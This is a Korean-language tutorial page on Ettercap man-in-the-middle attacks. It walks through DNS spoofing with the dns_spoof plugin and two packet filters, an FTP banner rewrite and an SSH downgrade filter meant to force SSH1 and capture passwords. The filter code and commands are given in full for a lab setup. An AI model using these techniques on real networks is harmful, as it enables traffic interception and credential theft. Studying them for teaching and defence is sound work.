ETTERCAP - The Easy Tutorial - Man in the middle attacks

Ettercap Mitm attacks
์ตœ์ข… ์—…๋ฐ์ดํŠธ: Jul 21 2011


Tool
Install
Ergonomy
Forum



Details Ettercap์€ ๋ฌด์—‡์ธ๊ฐ€?
์„ค์น˜๋ฐฉ๋ฒ•
ARP ํฌ์ด์ฆˆ๋‹
์ค‘๊ฐ„์ž ๊ณต๊ฒฉ (MITM, Man-in-the-middle Attack)
ํ†ต๊ณ„
๋Œ€์‘์ฑ…

Korean translation by Youngbin Benjamin Im helped by powerhan96.



โš ๏ธโš ๏ธโš ๏ธ
Please check our page about COVID-19!!
100 Questions and answers about Coronavirus.

โš ๏ธโš ๏ธโš ๏ธ
Merci de consulter notre page sur la COVID-19 !!
227 questions et rรฉponses sur le Coronavirus.


ARP๊ฐ์—ผ ์„ค๋ช…์„œ์„ ๋ดค๋‹ค๋ฉด ๋Œ€์ƒ์ž์˜ ARP์บ์‰ฌ๊ฐ€ ๊ฐ•์ œ์ ์œผ๋กœ ๋ณ€๊ฒฝ๋˜์–ด Ettercap PC๋ฅผ ํ†ต๊ณผํ•˜์—ฌ ์›ํ•˜๋Š” ๋ชฉ์ ์ง€๋กœ ํŒจํ‚ท์„ ๋ณด๋‚ด๋„๋ก ์„ค์ •์ด ๋˜์–ด์žˆ์„ ๊ฒƒ์ด๋‹ค.

๋„คํŠธ์›Œํฌ ์‹œ๋‚˜๋ฆฌ์˜ค ๋‹ค์ด์–ด๊ทธ๋žจ์€ Ettercap ์†Œ๊ฐœ ํŽ˜์ด์ง€์— ๋‚˜์™€์žˆ๋‹ค.

์ด๋Ÿฌํ•œ ํŠธ๋žฉ์ด ์„ค์ •์ด ๋˜์—ˆ๋‹ค๋ฉด ์ด๊ฒŒ ์ค‘๊ฐ„์ž ๊ณต๊ฒฉ์ด ๊ฐ€๋Šฅํ•œ ์ƒํ™ฉ์ด ๋œ ๊ฒƒ์ด๊ณ  ๋‘ PC๊ฐ„์˜ ์˜ค๊ณ  ๊ฐ€๋Š” ํŒจํ‚ท์„ ์ˆ˜์ •ํ•˜๊ณ  ํ•„ํ„ฐ๋ง ํ•  ์ˆ˜ ์žˆ๋Š” ์ƒํƒœ๋‹ค.

ํ”ผํ•ด์žPC๋ฅผ ๊ณต๊ฒฉํ•˜๊ธฐ ์œ„ํ•ด์„œ๋Š” Ettercap์˜ ํ”Œ๋Ÿฌ๊ทธ์ธ์„ ์‚ฌ์šฉํ•ด๋„ ๋˜๊ณ  ์ง์ ‘ ํ•„ํ„ฐ๋ฅผ ์ž‘์„ฑํ•˜์—ฌ ์‚ฌ์šฉํ•ด๋„ ๋œ๋‹ค.


1. ํ”Œ๋Ÿฌ๊ทธ์ธ 2. ํ•„ํ„ฐ


ํ”Œ๋Ÿฌ๊ทธ์ธ

์—ฌ๊ธฐ์„œ๋Š” dns_spoof๋ผ๋Š” Ettercap ํ”Œ๋Ÿฌ๊ทธ์ธ์„ ์‚ฌ์šฉํ•˜์—ฌ ๋งค์šฐ ์œ ๋ช…ํ•œ DNS ์Šคํ‘ธํ•‘ ๊ณต๊ฒฉ์„ ํ•  ๊ฒƒ์ด๋‹ค. DNS ์Šคํ‘ธํ•‘ ๊ณต๊ฒฉ์€ ๊ณต๊ฒฉ์ž๊ฐ€ DNS ์š”์ฒญ์„ ๋ฐ›์•„ DNS ์„œ๋ฒ„์ฒ˜๋Ÿผ ์‘๋‹ตํ•˜๋Š” ๊ฒƒ์ด๋‹ค.
ํ‰์†Œ์— ์ž์ฃผ ๋ฐฉ๋ฌธํ•˜๋Š” ์›นํŽ˜์ด์ง€๋ฅผ ๋ธŒ๋ผ์šฐ์ €๋ฅผ ํ†ตํ•ด ์ ‘๊ทผํ•  ๋•Œ, ์ž์‹ ์˜ PC (์ด์ „ ์„ค๋ช…์„œ์˜ ์˜ˆ์ œ์—์„œ IP์ฃผ์†Œ๋ฅผ 192.168.1.2๋กœ ์‚ฌ์šฉํ•˜์˜€๋‹ค)๋Š” ๊ฐ€์žฅ ๋จผ์ € URL์„ DNS ์„œ๋ฒ„๋กœ ๋ณด๋‚ด ์ด์— ํ•ด๋‹นํ•˜๋Š” IP์ฃผ์†Œ๋ฅผ ์š”์ฒญํ•  ๊ฒƒ์ด๊ณ  ์ด IP์ฃผ์†Œ๋ฅผ ๊ฐ€์ง€๊ณ  ๋ธŒ๋ผ์šฐ์ €๋Š” ํ•ด๋‹น ์›นํŽ˜์ด์ง€์˜ ์ •๋ณด๋ฅผ ๋ถˆ๋Ÿฌ์™€ ๋ณด์—ฌ์ค„ ๊ฒƒ์ด๋‹ค.
DNS ์Šคํ‘ธํ•‘์„ ํ•˜๋ฉด, DNS๋กœ์˜ ์š”์ฒญ์„ ๊ณต๊ฒฉ์ž๊ฐ€ ๊ฐ€๋กœ์ฑ„ ์ •์ƒ์ ์ธ DNS ์„œ๋ฒ„ ๋Œ€์‹  ์—‰๋šฑํ•œ IP์ฃผ์†Œ๋กœ ์‘๋‹ตํ•  ์ˆ˜ ์žˆ๋‹ค.
์œ„์™€ ๊ฐ™์€ ๊ณต๊ฒฉ์˜ ๊ฒฐ๊ณผ๋Š”, ํ”ผํ•ด์ž๊ฐ€ ์›ํ•˜๋Š” ์›นํŽ˜์ด์ง€๋ฅผ ์ ‘๊ทผํ•˜์˜€๋‹ค๊ณ  ์ƒ๊ฐํ•˜์ง€๋งŒ ์‹ค์ œ๋กœ๋Š” ๊ณต๊ฒฉ์ž๊ฐ€ ์ œ๊ณตํ•œ IP์ฃผ์†Œ์˜ ์›นํŽ˜์ด์ง€๋ฅผ ๋ณด๊ฒŒ ๋œ๋‹ค.
๊ณต๊ฒฉ์ž๊ฐ€ ์€ํ–‰๊ณผ ๊ฐ™์€ ์›นํŽ˜์ด์ง€๋ฅผ ์Šคํ‘ธํ•‘ํ•œ๋‹ค๋ฉด ์ด๋Ÿฌํ•œ ๊ณต๊ฒฉ์€ ์•„์ฃผ ์œ„ํ—˜ํ•  ์ˆ˜ ์žˆ๋‹ค. ๊ณต๊ฒฉ์ž๋Š” ๊ฐ€์งœ ์›นํŽ˜์ด์ง€๋ฅผ ์‹ค์ œ ์‚ฌ์ดํŠธ์™€ ๋™์ผํ•œ ๋ชจ์Šต์œผ๋กœ ๋งŒ๋“ค์–ด ๋‘๊ณ  ํ”ผํ•ด์ž๊ฐ€ ์ ‘๊ทผํ•˜๊ธฐ๋ฅผ ๊ธฐ๋‹ค๋ ธ๋‹ค๊ฐ€ ๊ฐœ์ธ์ •๋ณด๋ฅผ ์ทจ๋“ํ•  ์ˆ˜ ์žˆ๋‹ค.
์ด์ œ DNS ์Šคํ‘ธํ•‘ ๊ณต๊ฒฉ์„ ์‹คํ–‰ํ•ด๋ณด์ž.
์ฒซ ๋ฒˆ์งธ๋กœ ํ•ด์•ผ ํ•  ๊ฒƒ์€ /usr/share/ettercap/ ๋””๋ ‰ํ† ๋ฆฌ์— ์žˆ๋Š” etter.dnsํŒŒ์ผ์„ ์„ค์ •ํ•˜๋Š” ๊ฒƒ์ด๋‹ค.

#vim /usr/share/ettercap/etter.dns
ํŒŒ์ผ์„ ์—ด๋ฉด ์„ค์ •์— ๋Œ€ํ•œ ๋‚ด์šฉ์„ ๋ณผ ์ˆ˜ ์žˆ๋‹ค.
์•„๋ž˜๋Š” etter.dns์˜ ๋‚ด์šฉ์ด๋‹ค.

linux1.org
*.linux.com
www.linux.org
A
A
PTR
198.182.196.56
198.182.196.56
198.182.196.56
์œ„ ์„ค์ • ์ •๋ณด์— ๋”ฐ๋ฅด๋ฉด ํ”ผํ•ด์ž๊ฐ€ ์›น๋ธŒ๋ผ์šฐ์ €๋ฅผ ํ†ตํ•ด www.linux1.org์— ์ ‘์†ํ•˜๋ฉด ์‹ค์ œ๋กœ๋Š” www.linux.org ์‚ฌ์ดํŠธ๊ฐ€ ์—ด๋ฆฌ๋„๋ก ํ•˜๋ผ๋Š” ๊ฒƒ์ด๋‹ค.

DNS ์Šคํ‘ธํ•‘์„ ํ•˜๊ธฐ ์œ„ํ•ด์„œ๋Š” Ettercap ๊ทธ๋ž˜ํ”ฝ ์ธํ„ฐํŽ˜์ด์Šค์—์„œ dns_spoof ํ”Œ๋Ÿฌ๊ทธ์ธ์„ ํ™œ์„ฑํ™” ์‹œ์ผœ์•ผ ํ•œ๋‹ค. DNS ์Šคํ‘ธํ•‘ ๊ณต๊ฒฉ์„ ํ•˜๊ธฐ ์œ„ํ•ด์„œ๋Š” ARP ๊ฐ์—ผ ์„ค๋ช…์„œ์„ ๋จผ์ € ์ˆ˜ํ–‰ํ•˜๋„๋ก ํ•œ๋‹ค.

Plugins -> Manage the plugins
openmaniak ettercap man in the middle attack Manage the plugins

dns_spoof ๋ผ์ธ์„ ์„ ํƒํ•˜์—ฌ ํ”Œ๋Ÿฌ๊ทธ์ธ์„ ํ™œ์„ฑํ™” ์‹œํ‚จ๋‹ค. ํ™œ์„ฑํ™”๋Š” ๋ผ์ธ์˜ ์ขŒ์ธก์— ๋ณ„ํ‘œ์‹œ๋กœ ํ™•์ธ ํ•  ์ˆ˜ ์žˆ๋‹ค.

openmaniak ettercap  man in the middle attack dns_spoof line

์›น ๋ธŒ๋ผ์šฐ์ €์— www.linux1.org๋ฅผ ์ž…๋ ฅํ•œ๋‹ค.
์›น ํŽ˜์ด์ง€๋ฅผ ์—ด์–ด๋ณด๋ฉด ์‹ค์ œ ํŽ˜์ด์ง€๊ฐ€ ์•„๋‹Œ etter.dnsํŒŒ์ผ์— ์ถ”๊ฐ€ํ•œ www.linux1.org์ฃผ์†Œ์— ํ•ด๋‹นํ•˜๋Š” IP์ฃผ์†Œ์˜ ํŽ˜์ด์ง€์ธ ๊ฒƒ์„ ํ™•์ธํ•  ์ˆ˜ ์žˆ๋‹ค.

openmaniak ettercap  man in the middle attack

                       man in the middle attack openmaniak ettercap
openmaniak ettercap  man in the middle attack

DNS ์Šคํ‘ธํ•‘ ๋ฉˆ์ถ”๊ธฐ

Start -> Stop sniffing
๊ณต๊ฒฉ์„ ์ค‘๋‹จํ–ˆ์Œ์—๋„ ๋ถˆ๊ตฌํ•˜๊ณ  www.linux1.org์„ ์—ด์–ด๋ณด๋ฉด ๋ณ€๊ฒฝ๋œ www.linux.org์˜ ๋‚ด์šฉ์„ ๋ณด๊ฒŒ ๋œ๋‹ค. ์ด๊ฒƒ์€ ํด๋ผ์ด์–ธํŠธ์˜ PC์˜ DNS ์บ์‹œ์ •๋ณด๊ฐ€ ๋‚จ์•„์žˆ๊ธฐ ๋•Œ๋ฌธ์ธ๋ฐ, ์œˆ๋„์šฐ์˜ ๊ฒฝ์šฐ DNS ์บ์‹œ์˜ ๋‚ด์šฉ์„ 300์ดˆ(5๋ถ„)๊ฐ„ ์œ ์ง€ํ•˜๋„๋ก ์„ค์ •๋˜์–ด ์žˆ๊ธฐ ๋•Œ๋ฌธ์ด๋‹ค. ์›๋ž˜๋Œ€๋กœ ๋ณต๊ตฌ๋ฅผ ํ•˜๋ ค๋ฉด 5๋ถ„์„ ๊ธฐ๋‹ค๋ฆฌ๊ฑฐ๋‚˜ ๋‹ค์Œ๊ณผ ๊ฐ™์€ ๋ช…๋ น์–ด๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ DNS ์บ์‰ฌ๋ฅผ ์ดˆ๊ธฐํ™” ํ•  ์ˆ˜ ์žˆ๋‹ค.

์œˆ๋„์šฐ์—์„œ ์ปด๋งจ๋“œ๋ผ์ธ ์ธํ„ฐํŽ˜์ด์Šค๋ฅผ ์‹คํ–‰ํ•œ๋‹ค.
Start -> Run -> cmd

C:\Documents and Settings\administrator>ipconfig /flushdns
์šฐ๋ถ„ํˆฌ์—์„œ๋Š” ๋‹ค์Œ๊ณผ ๊ฐ™์€ ๋ช…๋ น์–ด๋ฅผ ์‚ฌ์šฉํ•˜๋ฉด ๋œ๋‹ค: โ€œ/etc/init.d/dns-clean startโ€
DNS ์บ์‹œ๋ฅผ ํ™•์ธํ•˜๋ ค๋ฉด ๋‹ค์Œ๊ณผ ๊ฐ™์€ ๋ช…๋ น์–ด๋ฅผ ์‚ฌ์šฉํ•œ๋‹ค.

C:\Documents and Settings\administrator>ipconfig /displaydns
๋งŒ์•ฝ DNS ์บ์‹œ์˜ ๋””ํดํŠธ ์ €์žฅ์‹œ๊ฐ„์„ ๋ณ€๊ฒฝํ•˜๋ ค๋ฉด ์œˆ๋„์šฐ ๋ ˆ์ง€์ŠคํŠธ๋ฆฌ์˜ ๊ฐ’์„ ๋ณ€๊ฒฝํ•ด์•ผ ํ•œ๋‹ค.
๋ ˆ์ง€์ŠคํŠธ๋ฆฌ๋ฅผ ๋ณ€๊ฒฝํ•  ๊ฒฝ์šฐ์—๋Š” ๋งค์šฐ ์กฐ์‹ฌํ•ด์•ผ ํ•œ๋‹ค. ์ž˜๋ชป๋œ ์„ค์ •์€ ์‹œ์Šคํ…œ์— ํฐ ์˜ํ–ฅ์„ ์ค„ ์ˆ˜ ์žˆ์œผ๋ฉฐ ๋ถ€ํŒ…์ด ์•ˆ ๋˜๋Š” ๊ฒฝ์šฐ๊ฐ€ ์ƒ๊ธธ ์ˆ˜๋„ ์žˆ๋‹ค.

Start -> Run -> arborescence below:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\

์˜ค๋ฅธ์ชฝ ํŒจ๋„์˜ โ€œNegativeCacheTimeโ€์„ ํด๋ฆญํ•œ๋‹ค.

openmaniak ettercap registry negativecachetime man in the middle attack

โ€œDecimalโ€ ๋ฒ„ํŠผ์„ ํด๋ฆญํ•˜๊ณ  DNS ์บ์‹œ ์ €์žฅ์‹œ๊ฐ„์˜ ๊ฐ’์„ ๋ณ€๊ฒฝํ•œ๋‹ค.

 man in the middle attack openmaniak ettercap registry negativecachetime

Top of the page



ํ•„ํ„ฐ

ํ•„ํ„ฐ๋Š” ํŒจํ‚ท์˜ ๋‚ด์šฉ์„ ๋ฐ”๊ฟ€ ์ˆ˜ ์žˆ๋„๋ก ํ•˜๋Š” ๊ธฐ๋Šฅ์ด๋‹ค.
ํ•„ํ„ฐ๋ฅผ ์„ค์ •ํ•˜๊ณ  ์ ์šฉํ•˜๋ ค๋ฉด ์„ค์ •ํŒŒ์ผ์„ ์ปดํŒŒ์ผ ํ•ด์•ผ ํ•œ๋‹ค. ์ด๋ฏธ ์ •์˜๋œ ์˜ˆ์ œ๋Š” /usr/share/ettercap ๋””๋ ‰ํ† ๋ฆฌ์—์„œ ์ฐพ์„ ์ˆ˜ ์žˆ๋‹ค.
๋‘ ๊ฐ€์ง€ ์˜ˆ๋ฅผ ํ†ตํ•ด Ettercap ํ•„ํ„ฐ๋ฅผ ๋ณด๋„๋ก ํ•˜๊ฒ ๋‹ค.

1. FTP ํ”„๋กฌํ”„ํŠธ ๋ณ€๊ฒฝ
2. SSH downgrade ๊ณต๊ฒฉ

1. FTP ํ”„๋กฌํ”„ํŠธ ๋ณ€๊ฒฝ:

FTP ์—ฐ๊ฒฐ์—์„œ ํ”„๋กฌํ”„ํŠธ๋ฅผ ๋ณ€๊ฒฝํ•˜๋Š” ์˜ˆ์ œ๋ฅผ ๋ณด๋„๋ก ํ•˜๊ฒ ๋‹ค. ์•„๋ž˜๋Š” /usr/share/ettercap ๋””๋ ‰ํ† ๋ฆฌ์— ์žˆ๋Š” test_filter๋ผ๋Š” ์„ค์ •ํŒŒ์ผ์ด๋‹ค.

# replace the FTP prompt
if (tcp.src == 21 && search(DATA.data, "ProFTPD")) {
   replace("ProFTPD","TeddyBearFTPD);
}


Ettercap์€ ์ปดํŒŒ์ผ ๋œ ์„ค์ •ํŒŒ์ผ๋งŒ ๋กœ๋“œํ•  ์ˆ˜ ์žˆ์œผ๋ฏ€๋กœ etterfilter๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ ์ปดํŒŒ์ผ์„ ํ•ด์•ผ ํ•œ๋‹ค.

#etterfilter etter_filter -o etter_filter_compil
etter_filter_compil ์ด๋ฆ„์œผ๋กœ ์ปดํŒŒ์ผ ๋œ ํ•„ํ„ฐํŒŒ์ผ์ด ์ƒ์„ฑ๋œ๋‹ค.

Ettercap์—์„œ ๋ถˆ๋Ÿฌ์˜จ๋‹ค.

Filters -> Load a filter...
openmaniak ettercap man in the middle attack Load a filter

openmaniak ettercap man in the middle attack Load a filter

์ด์ œ, ํด๋ผ์ด์–ธํŠธ PC(192.168.1.2)๋ฅผ ์ด์šฉํ•˜์—ฌ FTP์—ฐ๊ฒฐ์„ ์‹œํ—˜ํ•ด๋ณด๋„๋ก ํ•œ๋‹ค. ์‹œํ—˜ ๋ฐฉ๋ฒ•์€ Ettercap ํ•„ํ„ฐ๋ฅผ ์ ์šฉํ•˜๊ธฐ ์ด์ „๊ณผ ์ดํ›„๋ฅผ ๋น„๊ตํ•˜๋Š” ๋ฐฉ์‹์œผ๋กœ ํ•œ๋‹ค.
โ€œxyzโ€๋Š” ์›น์‚ฌ์ดํŠธ ๋ช…์ด๋ฉฐ IP์ฃผ์†Œ๋Š” โ€œ1.2.3.4โ€์ด๋‹ค.

(๋‹น์—ฐํ•œ ์–˜๊ธฐ์ง€๋งŒ, ๊ณต๊ฒฉ์ž PC๋Š” ์ค‘๊ฐ„์ž ์ƒํƒœ๋กœ ๋งŒ๋“ค์–ด ๋‘์–ด์•ผ ํ•œ๋‹ค. ์ค‘๊ฐ„์ž ์ƒํƒœ๊ฐ€ ์•„๋‹ˆ๋ผ๋ฉด [ARP ๊ฐ์—ผ ์„ค๋ช…์„œ]๋ฅผ ๋จผ์ € ์ˆ˜ํ–‰ํ•œ ํ›„ ์ง„ํ–‰ํ•˜๊ธฐ ๋ฐ”๋ž€๋‹ค.)

C:\Documents and Settings\Administrator>ftp www.xyz.com
Connected to xyz.com.
220 "ProFTPD 1.3.0a Server ("ProFTPD) [1.2.3.4]
User (xyz.com:(none)):


C:\Documents and Settings\Administrator>ftp www.xyz.com
Connected to xyz.com.
220 "TeddyBear FTPD 1.3.0a Server ("TeddyBear FTPD) [1.2.3.4]
User (xyz.com:(none)):



Top of the page     Filter menu

2. SSH Downgrade ๊ณต๊ฒฉ

โ€œthe downgrade ๊ณต๊ฒฉโ€์œผ๋กœ ๋ถˆ๋ฆฌ๋Š” ํŠน๋ณ„ํ•œ ๊ณต๊ฒฉ ์—ญ์‹œ ์ค‘๊ฐ„๊ฐ€ ํฌ์ด์ฆˆ๋‹์ด ์™„๋ฃŒ๋˜๋ฉด ๊ณต๊ฒฉ์ด ๊ฐ€๋Šฅํ•˜๊ฒŒ ๋œ๋‹ค. ์ด ๊ณต๊ฒฉ์˜ ์›๋ฆฌ๋Š” ํŒจํ‚ท ๋‚ด์šฉ์˜ ์ •๋ณด๋ฅผ ๋ณ€๊ฒฝํ•˜์—ฌ ์‚ฌ์šฉํ•˜๋Š” ํ”„๋กœํ† ์ฝœ ๋ฒ„์ „์„ ์ทจ์•ฝํ•œ ๋ฒ„์ „์œผ๋กœ ๋‚ฎ์ถ”๋Š” ๋ฐฉ์‹์ด๋‹ค.

---------------- ์›๋ฆฌ ----------------

SSH๋Š” Downgrade ๊ณต๊ฒฉ์˜ ์˜ˆ๋กœ ๊ฐ€์žฅ ๋งŽ์ด ์‚ฌ์šฉ๋˜๋Š” ํ”„๋กœํ† ์ฝœ ์ค‘ ํ•˜๋‚˜๋กœ, ๊ณต๊ฒฉ ๋Œ€์ƒ PC์™€ ์„œ๋ฒ„๊ฐ€ ์‚ฌ์šฉํ•˜๋Š” SSH๋ฅผ ๋ณด์•ˆ์ด ์ทจ์•ฝํ•œ SSH1 ํ”„๋กœํ† ์ฝœ์„ ์‚ฌ์šฉํ•˜๋„๋ก ๊ณต๊ฒฉ์ž๊ฐ€ ๊ฐ•์ œํ•˜๋Š” ๋ฐฉ๋ฒ•์ด๋‹ค.

ํด๋ผ์ด์–ธํŠธ๋Š” SSH ๋งํฌ๋ฅผ ์„ฑ๋ฆฝํ•˜๊ธฐ ์œ„ํ•ด ์„œ๋ฒ„์— ์ง€์› ๊ฐ€๋Šฅํ•œ ํ”„๋กœํ† ์ฝœ ๋ฒ„์ „ ์ •๋ณด๋ฅผ ์š”์ฒญํ•œ๋‹ค.
์„œ๋ฒ„๋Š” ๋‹ค์Œ๊ณผ ๊ฐ™์€ ์‘๋‹ต์„ ๋ณด๋‚ด๊ฒŒ ๋œ๋‹ค:
- ssh-2.xx The server supports only SSH2
- ssh-1.99 The server supports SSH1 and SSH2
- ssh-1.51 The server supports only SSH1

์—ฌ๊ธฐ์„œ ๋ณด์—ฌ์ค„ ์˜ˆ์ œ์—์„œ๋Š” ์„œ๋ฒ„์™€ ํด๋ผ์ด์–ธํŠธ ๋ชจ๋‘ SSH1๊ณผ SSH2 ๋‘˜ ๋‹ค ์ง€์›ํ•˜๋„๋ก ์„ค์ •์„ ํ•˜์˜€์œผ๋ฉฐ SSH2๋ฅผ ์ƒ์œ„ ์„ค์ •์œผ๋กœ ์ง€์ •ํ•ด ๋†“์•˜๋‹ค.

๋งŒ์•ฝ, ์„œ๋ฒ„์—์„œ SSHv1๊ณผ SSHv2๋ฅผ ์‚ฌ์šฉ ๊ฐ€๋Šฅํ•˜๋„๋ก ์„ค์ •ํ•˜์˜€์œผ๋ฉด ํ•ด์ปค๋Š” โ€œ1.99โ€ ๋ฌธ์ž์—ด์„ โ€œ1.51โ€๋กœ ๋ณ€๊ฒฝํ•˜์—ฌ ํด๋ผ์ด์–ธํŠธ๋กœ ๋ณด๋‚ด๊ฒŒ ๋˜๋ฉฐ ํด๋ผ์ด์–ธํŠธ๋Š” ์„œ๋ฒ„๊ฐ€ SSH1๋งŒ ์ง€์›ํ•˜๋Š” ๊ฒƒ์œผ๋กœ ์ฐฉ๊ฐํ•˜๊ฒŒ ๋œ๋‹ค. ๊ฒฐ๊ตญ ํด๋ผ์ด์–ธํŠธ๋Š” SSH1 ๋งํฌ๋ฅผ ์‚ฌ์šฉํ•˜๊ฒŒ ๋œ๊ณ  ์•ˆ์ „ํ•œ SSH2 ํ”„๋กœํ† ์ฝœ์„ ์‚ฌ์šฉํ† ๋ก ์„ค์ •ํ•ด ๋†“์€ ํด๋ผ์ด์–ธํŠธ ์—ญ์‹œ SSH1 ๋งํฌ๋ฅผ ์—ด๊ฒŒ ๋œ๋‹ค. ๊ทธ๋Ÿฐ ๋‹ค์Œ ํ•ด์ปค๋Š” SSH1์˜ ์ทจ์•ฝํ•œ ๋น„๋ฐ€๋ฒˆํ˜ธ ์ธ์ฆ ์ ˆ์ฐจ๋ฅผ ์ด์šฉํ•˜์—ฌ ๋น„๋ฐ€๋ฒˆํ˜ธ๋ฅผ ๋ฐ”๋กœ ์บก์ฒ˜ํ•  ์ˆ˜ ์žˆ๊ฒŒ ๋œ๋‹ค..

putty ssh downgrade attack

---------------- ์˜ˆ์ œ๋ฅผ ์œ„ํ•œ ์ค€๋น„์‚ฌํ•ญ ----------------

a. SSH Server: ๋ฆฌ๋ˆ…์Šค์— OpenSSH๋ฅผ ์„ค์น˜ํ•œ๋‹ค.
b. SSH client: Windows์— Putty๋ฅผ ๋‹ค์šด๋ฐ›๋Š”๋‹ค.
c. Hacker machine: Ettercap.

a. Server installation:

#apt-get install openssh-server

OpenSSH์„œ๋ฒ„์—์„œ ๋””ํดํŠธ๋กœ SSH2 ํ”„๋กœํ† ์ฝœ๋งŒ ์‚ฌ์šฉํ•˜๋„๋ก ์„ค์ •๋˜์–ด ์žˆ๋‹ค. SSH1 ํ”„๋กœํ† ์ฝœ ์‚ฌ์šฉ์„ ํ™œ์„ฑํ™” ํ•˜๋ ค๋ฉด /etc/ssh/sshd_configํŒŒ์ผ์—์„œ โ€œProtocolโ€๋กœ ์‹œ์ž‘๋˜๋Š” ๋ผ์ธ์„ ์ˆ˜์ •ํ•ด์•ผ ํ•œ๋‹ค.

#vim /etc/ssh/sshd_config
Protocol 1,2
์œ„์™€ ๊ฐ™์ด ์„ค์ •ํŒŒ์ผ ์ˆ˜์ •์ด ๋๋‚ฌ์œผ๋ฉด SSH1 ํ‚ค๊ฐ’์„ ์ƒ์„ฑํ•ด์•ผ ํ•œ๋‹ค. ๋งŒ์•ฝ ํ‚ค๊ฐ’์„ ์ƒ์„ฑํ•˜์ง€ ์•Š์œผ๋ฉด SSH ์„œ๋ฒ„๋ฅผ ์žฌ์‹œ์ž‘ ํ•˜์˜€์„ ๋•Œ ๋‹ค์Œ๊ณผ ๊ฐ™์€ ์˜ค๋ฅ˜๋ฅผ ๋ณผ ๊ฒƒ์ด๋‹ค. Disabling protocol version 1. Could not load host key.

#ssh-keygen -t rsa1 -f /etc/ssh/ssh_host_key -N ""
Key ํŒจ์Šค๋ฅผ sshd_configํŒŒ์ผ์— ์ €์žฅํ•œ๋‹ค.

HostKey /etc/ssh/ssh_host_key
๋งˆ์ง€๋ง‰์œผ๋กœ ์„œ๋ฒ„๋ฅผ ์žฌ์‹œ์ž‘ ํ•œ๋‹ค.

#/etc/init.d/ssh restart
   * Restarting OpenBSD Secure Shell server sshd

SSH ์„œ๋ฒ„๋Š” ์ด์ œ SSH1๊ณผ SSH2 ํ”„๋กœํ† ์ฝœ์„ ์‚ฌ์šฉ ๊ฐ€๋Šฅํ•˜๋„๋ก ์„ค์ •์ด ๋˜์—ˆ๋‹ค. ๊ทธ๋ฆฌ๊ณ  โ€œssh-1.99โ€๋กœ ์‘๋‹ตํ•˜๋„๋ก ์„ค์ •์ด ๋˜์—ˆ๋‹ค. ์ด๊ฒƒ์€ ๋‹ค์Œ๊ณผ ๊ฐ™์€ ๋ช…๋ น์–ด๋กœ ํ™•์ธ์„ ํ•  ์ˆ˜ ์žˆ๋‹ค.

#telnet server_ip_address 22
Trying server_ip_address...
Connected to server_ip_address.
Escape character is '^]'.
SSH-1.99-OpenSSH_4.6p1 Debian-5ubuntu0.1


b. Client installation:

Putty ํด๋ผ์ด์–ธํŠธ๋ฅผ ๋‹ค์šด๋กœ๋“œํ•œ๋‹ค. Putty๋Š” ์˜คํ”ˆ ์†Œ์Šค์ด๋ฉฐ ์œˆ๋„์šฐ์šฉ SSHํด๋ผ์ด์–ธํŠธ๋กœ ์œ ๋ช…ํ•˜๋‹ค.
SSH์˜ ๋””ํดํŠธ ์„ค์ •์„ ์œ ์ง€ํ•œ๋‹ค. SSH1๊ณผ SSH2 ๋ชจ๋‘ ์ˆ˜์šฉ ๊ฐ€๋Šฅ ํ•˜์ง€๋งŒ SSH2๋ฅผ ์šฐ์„ ์ ์œผ๋กœ ์‚ฌ์šฉํ•œ๋‹ค.

putty ssh2 version

c. Ettercap installation:

Ettercap installation ์„ค๋ช…์„œ์„ ์‚ฌ์šฉํ•˜์—ฌ Ettercap์„ ์„ค์น˜ํ•˜๊ณ  ARP ํฌ์ด์ฆˆ๋‹ ์„ค๋ช…์„œ์„ ์‚ฌ์šฉํ•˜์—ฌ ๊ณต๊ฒฉ์ž PC๋ฅผ ์ค‘๊ฐ„์ž ํ™˜๊ฒฝ์œผ๋กœ ๋งŒ๋“ ๋‹ค.

์ด์ œ ํ™˜๊ฒฝ์˜ ์„ค์ •์€ ์™„๋ฃŒํ•˜์˜€์œผ๋ฉฐ SSH downgrade๊ณต๊ฒฉ์„ ์ˆ˜ํ–‰ํ•  ์ˆ˜ ์žˆ๋‹ค.

---------------- SSH downgrade ๊ณต๊ฒฉ ์ˆ˜ํ–‰ ----------------

Ettercap์€ SSH downgrade ๊ณต๊ฒฉ์— ์‚ฌ์šฉ ๊ฐ€๋Šฅํ•œ ์„ค์ •ํŒŒ์ผ์„ ์ œ๊ณตํ•œ๋‹ค. ํŒŒ์ผ์€ /usr/share/ettercap/etter_filter_ssh์ด๋‹ค.
ํŒŒ์ผ์˜ ๋‚ด์šฉ์€ ํ™•์ธํ•  ์ˆ˜ ์žˆ์œผ๋‚˜ ์ˆ˜์ •ํ•  ํ•„์š”๋Š” ์—†๋‹ค.

#cat /usr/share/ettercap/etter.filter.ssh
if (ip.proto == TCP) {
if (tcp.src == 22) {
if ( replace("SSH-1.99", "SSH-1.51") ) {
msg("[SSH Filter] SSH downgraded from version 2 to 1\n");
} else {
if ( search(DATA.data, "SSH-2.00") ) {
msg("[SSH Filter] Server supports only SSH version 2\n");
} else {
if ( search(DATA.data, "SSH-1.51") ) {
msg("[SSH Filter] Server already supports only version 1\n");
}
}
}
}
}
์œ„์˜ ํŒŒ์ผ์„ ์ปดํŒŒ์ผ๋งŒ ํ•˜๋ฉด ๋œ๋‹ค.

#etterfilter etter_filter_ssh -o etter_filter_ssh_co
์ด์ œ ํ•„ํ„ฐ๋ฅผ ๋กœ๋“œํ•˜๋ฉด ๋œ๋‹ค.

Filters -> Load a filter...
ettercap load ssh downgrade filter

์ปดํŒŒ์ผ๋œ ํ•„ํ„ฐ๋ฅผ ์„ ํƒํ•œ๋‹ค.

ettercap load ssh downgrade filter file

ํ•„ํ„ฐ๊ฐ€ ๋กœ๋“œ ๋˜์—ˆ์œผ๋ฏ€๋กœ ํด๋ผ์ด์–ธํŠธ์—์„œ SSH๋งํฌ๋ฅผ ์—ด ์ค€๋น„๊ฐ€ ๋˜์—ˆ๋‹ค.

ettercap ssh downgrade filter loaded

ํด๋ผ์ด์–ธํŠธ, ์„œ๋ฒ„, ๊ทธ๋ฆฌ๊ณ  ํ•ด์ปคPC์˜ ์„ค์ •์ด ์ œ๋Œ€๋กœ ๋˜์—ˆ๋‹ค.
์ด์ œ ํด๋ผ์ด์–ธํŠธ์—์„œ Putty๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ SSH๋งํฌ๋ฅผ ์—ด์–ด๋ณด๋„๋ก ํ•˜์ž.
